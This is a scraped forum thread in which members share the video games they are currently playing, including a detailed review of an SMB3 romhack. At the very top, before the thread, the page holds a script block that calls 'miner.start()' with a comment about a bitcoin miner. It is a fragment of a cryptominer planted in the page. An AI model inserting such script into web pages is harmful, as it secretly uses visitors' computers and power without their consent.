<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitypge project

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Alice
Pronouns: Girl person

Re: What games are you playing?

Postby Alice » 5 years ago

I got Saints Row IV on sale and played that today.

My character is the best:
It was fun up until my friend who has completely beaten the game multiple times decided he was going to try and join without so much as even asking first. Playing the game with him would have ruined any fun for me because in this sort of game he's all business in co-op and on top of that I couldn't simply turn him down because he's one of my friends who tends to take it very personally when I do. So I had to finish what I was doing and just quit instead.

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

Yeah Ashan you could do wait mode if active mode is too hard to use. Also when it's your turn the person you are controlling should have some sort of highlight over their name.
Also if you'd like to see an example fight here's one.
Edit: Also, I'm about an hour in to mario and luigi: dream team... and let me tell you, it's fun.... but... does it really need to have this much hand-holding? Can't you let me figure things out on my own game? Gosh darn it!
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Bean

Postby Bean » 5 years ago

That's one of the two criticisms with Dream Team. That and something that happens much later in the game. Still, I loved it. Then again, I'm a Mario (Luigi) guy, so yeah.

Beat Chrono Trigger yesterday. Going to move on back to Mario Kart 8 for the time being now.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 5 years ago

Bean wrote:Beat Chrono Trigger yesterday.
Oh, that's great! Congratulations!

Did you get the best ending?
twitter (spicy at times!) | avatar by kuma

who cares:

devil†zukin

Postby devil†zukin » 5 years ago

the one where

?

KobaBeach
obscure jrpg enthusiast

yes that one

who cares:

Bean

Normal and developer endings, actually. I watched the rest on YT after the fact.

Saturn Moriya

Postby Saturn Moriya » 5 years ago

Just died to Orochi in DQ3 so now I'm gonna kill Orochi in Okami.

Your blood their blood serves the same!!

Bean

Back to Mario Kart 8. Might throw in another short game or two into the mix along with it.

Ashan
The world has become a place

Postby Ashan » 5 years ago

FFX-2 isn't keeping my interest as much as I want it to.
I feel like I'm never making any progress. I'll keep at it but in the meantime I'll probably start a PS3 game alongside it.
I have a few options for games I've been meaning to play:
  • Demon's Souls
  • Fallout 3
  • FFXIII
  • Infamous
Don't know which one to start yet.

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

Ashan wrote:FFX-2 isn't keeping my interest as much as I want it to.
I feel like I'm never making any progress.
FFX-2 plays a lot more like a western RPG, where, although there *is* a central plot to follow, much of the game is open-ended and is based more on exploration, doing side-quests, that sort of thing. It's definitely a bit jarring after the very straight-forward, plot-driven, FF10, I'll grant that. But no one says you *have* to play it. Sounds like you have several other games on backlog, so there's no shame in just setting it aside for a while.

In my own experience, I actually had FFX-2 for almost a full *decade* before I actually *finally* decided to try it after randomly deciding to read up on various aspects of it on the Final Fantasy Wiki.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

pholtos
Loves adorable things.

I don't often feel this way about a game in this era but gosh darn it ape escape is a good game. I still feel silly looking at their tiny mouths that aren't in tune with the voices but that's a miniscule thing for a game about platforming.

The professor does have glorious facial hair however.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

Ashan
The world has become a place

Postby Ashan » 5 years ago

I decided to start inFamous.
It's pretty fun. The overall game feels SUPER a lot like the Spiderman 2 game, and I loved that game.

KobaBeach
obscure jrpg enthusiast

Hey~

Restarted Romancing SaGa 2 some days ago out of boredom~
Beat the Hive Queen legit~

I grinded for techs~ (also grinded a bit of JP to get the Magic Research Center)

My ♀ Light Infantry had a tech that had a large chance of stunning the enemy, my ♀ Free Fighter had an tech that did 500+ HP, everyone had large amounts of WP, and I was using the formation you get by choosing a Privateer as your emperor (which seems to boost your character's agility, not sure?).

It took a few attempts, but I made it!!

I wasn't able to do the pirates quest because I skipped a generation earlier than usual due to grinding (it wasn't a big loss, though), so I did the Garon quest in the earlygame, and got myself the Privateer class, ahaha~

My emperor was Enrique, named after Enrique de Malaca!
And now I picked a ♂ Holy Order, Paul, named after St. Paul!

Love this series~
YelseyKing wrote:FFX-2 plays a lot more like a western RPG, where, although there *is* a central plot to follow, much of the game is open-ended and is based more on exploration, doing side-quests, that sort of thing.
Guess that's another game I'll be playing in the future.

I also should start playing some WRPGs, they look really interesting! Maybe Ultima IV or Fallout 1?

(I haven't played Ninja Gaiden in a while, need to get around to that)

who cares:

Cubewano

Postby Cubewano » 5 years ago

Just started playing Half Life Opposing Force because Steam
http://buymybook@frauds.wav.avi.biz.co.uk
3DS friendcode: 2079-8183-3599

NOT a part of the Illuminati

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 5 years ago

After finishing Tales of the Abyss (which was a good time waster while I didn't have internet) I've been playing 999
That crazy voice dude

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 5 years ago

opposing force and 999 are both amazing so enjoy
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

pholtos
Loves adorable things.

Ugh... 999... that game where you have to replay every scene and puzzle just to try a different combination of things that actually gives a different ending.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 5 years ago

You can fast forward through dialogue that you've already seen, pholtos
That crazy voice dude

pholtos
Loves adorable things.

Yeah you can fastforward it but I'd rather just skip it.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

Leet

pholtos wrote:Ugh... 999... that game where you have to replay every scene and puzzle just to try a different combination of things that actually gives a different ending.
yeah thats called, playing the video game again. because thats how alternate endings in video games work.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

pholtos
Loves adorable things.

I'm talking like this because I played through the game like 5-6 times and only found like 3 endings and it sorta drove me crazy and I haven't touched the game since.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

Leet

heh tbh after finding the three bad endings i googled a spoiler-free guide on how to get the last two (technically listed as three but really its just two with one of them getting cut short if you havent seen the other one)

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

Still going through Super Mario Bros. 3Mix, as mentioned in the Request Grab Bag thread. I'm enjoying the hack overall, but it's far from without its faults.

The game has definitely improved over the first two worlds. Powerups are beginning to become more plentiful and varied. The Penguin Suit is my favorite so far; it's a modified Frog Suit with Ice Flower powers thrown in, and it's also fairly plentiful. Very useful.

First off, as observed in the preview videos, the stage design is still very basic. There are *lots* of rehashes of stages from other games in the series, few, if any, puzzles to deal with, few particularly demanding jumps or dangerous enemy placements... the game is honestly on the easy side. Perhaps even moreso than SMB3 itself. The star coins are generally very easy to find, not usually requiring you to go far out of your way or do anything particularly risky; in many cases, trying to go down every pipe is enough to sniff them out. That these pipes in question aren't marked in any way, though, means you literally *do* need to try them all.

Aesthetically, the game is also very weak. There are very few decorative background elements used in the stages, graphical glitches and cutoff everywhere, and questionable re-purposing of vanilla assets (the tops of the hill platforms were used to create SMB1-style "mushroom" platforms, which does not particularly look good, as one example). The world map design is similarly lazy, with, again, few decorative elements in place, and it looks, in several places, like the hacker just used the existing world maps and rearranged them slightly.

But that said, there are a lot of neat ASM gimmicks in place. There are mid-points, as well as secret areas in some stages. The addition of Yoshi, even if he's a bit glitchy (especially graphically) and, thus far, in only a single world (world 4), is definitely cool. The bosses, while also easy, have some interesting setups and strategies. I also like the "Minus World"-ish World 0, of which small parts can be accessed from a few secret routes along the main worlds, and I assume I'll be able to visit the world proper later.

Overall, there's definitely some neat stuff there, but SMB3Mix feels more like a concept/tech demo hack; something that *can* be done with the SMB3 engine, but which, itself, was not utilized in an especially good way. I hope the ASM hacks are released publically, as with them, and better level design and aesthetics, the possibilities are honestly endless.

Edit: Warning to future SMB3Mix players! Stage 7-6 has a broken, invisible midpoint. World 7 is based on Super Mario Galaxy, and has an inverse gravity gimmick. The midpoint in question is just before the pipe that leads to the last bit of the stage, in a reverse gravity section in which you're walking on a ceiling. If you die beyond this point, it respawns you just before the pipe, but without the inverted gravity, so you just fall and die. Or you hold right and somehow get dragged up into the ceiling, scrolled along the entire stage, and eventually... fall and die.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

Euparkeria
Palaeontological Platformerer
Pronouns: he/him/his

Postby Euparkeria » 5 years ago

I'm playing Mega Man 9. I love the game so far. 5 levels are finished, and I haven't even tried special weapons against bosses. The weapons are great btw. It's pretty annoying that finished levels can't be exited on command. MMX and MM7 have that option, so would it ruin the "retro" feeling? I don't think so. Also with all the amazing music in this game, I'm disappointed with some tracks being straight from MM2. Is that there to please the nostalgia for MM2, as it seems to be "everyone's" favourite? It just seems wrong to reuse music like that, and the fact MM9's soundtrack is my favorite along with 3 and 4 makes me long for the new tunes they would have composed. Otherwise I think this might be my new favourite MM game. I like the challenges and the replay value they add.
Cool banner by Neutron Star!

Return to “the cartridgé”